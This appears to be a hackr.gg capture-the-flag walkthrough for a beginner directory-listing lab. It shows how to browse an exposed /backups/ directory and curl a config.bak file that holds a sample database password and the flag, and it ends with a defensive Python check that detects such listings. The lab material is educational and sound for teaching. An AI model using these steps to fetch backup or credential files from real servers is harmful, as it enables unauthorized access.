HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FileDump — Directory Listing

Category: Security Misconfiguration
Difficulty: Beginner
Vuln class: Security Misconfiguration
Steps: 2
// Objective
Find the exposed backup directory via directory listing and retrieve the flag from a backup file.
// Tools required
Browser, curl, gobuster
// Step-by-step walkthrough
1. Browse to the web root
Navigate to the target URL. The server doesn't have a default index page in certain directories — check if directory listing is enabled.
Command / Input
http://TARGET/backups/
Output
Index of /backups/
backup_2024.zip
db_dump.sql
config.bak
Directory listing exposes every file in the directory. This should be disabled in production.
2. Download the config backup
The config.bak file likely contains credentials or sensitive data — and the flag.
Command / Input
curl http://TARGET/backups/config.bak
Output
DB_PASSWORD=sup3r_s3cr3t
FLAG=HackrGG{m1sc0nf1g_d1r_l1st1ng_3xp0s3d}
API_KEY=...
// Flag
Flag value
HackrGG{m1sc0nf1g_d1r_l1st1ng_3xp0s3d}
Inside config.bak in the exposed /backups/ directory.
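
The misconfiguration from step 1 can be caught on your own servers by inspecting response bodies for an auto-generated index that links backup-style files. The check below is an added example, not part of the original walkthrough; the names `audit_listing`, `IndexParser` and `RISKY_SUFFIXES`, the suffix list, and the sample HTML are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumption: suffixes treated as backup-style; the first three appear in the listing above.
RISKY_SUFFIXES = (".bak", ".sql", ".zip", ".old", ".tar.gz")


class IndexParser(HTMLParser):
    """Collects the <title> text and every link target on the page."""
    def __init__(self):
        super().__init__()
        self.title, self.hrefs, self._in_title = "", [], False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a" and dict(attrs).get("href"):
            self.hrefs.append(dict(attrs)["href"])

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def audit_listing(body):
    """Return (is_listing, risky_files) for one HTTP response body."""
    parser = IndexParser()
    parser.feed(body)
    is_listing = parser.title.strip().lower().startswith("index of")
    # Ignore parent/absolute links, column-sort links (?C=N;O=D) and subdirectories.
    files = [h for h in parser.hrefs
             if not h.startswith(("?", "/", "..")) and not h.endswith("/")]
    risky = [f for f in files if f.lower().endswith(RISKY_SUFFIXES)]
    return is_listing, (risky if is_listing else [])


# Constructed sample modelled on the step 1 output (not captured from a real server).
SAMPLE = """<html><head><title>Index of /backups/</title></head><body>
<h1>Index of /backups/</h1><a href="../">../</a>
<a href="backup_2024.zip">backup_2024.zip</a>
<a href="db_dump.sql">db_dump.sql</a>
<a href="config.bak">config.bak</a>
<a href="readme.txt">readme.txt</a></body></html>"""

if __name__ == "__main__":
    print(audit_listing(SAMPLE))
```

A positive result on a production path means directory listing is still enabled there and the flagged files are downloadable by anyone who requests them.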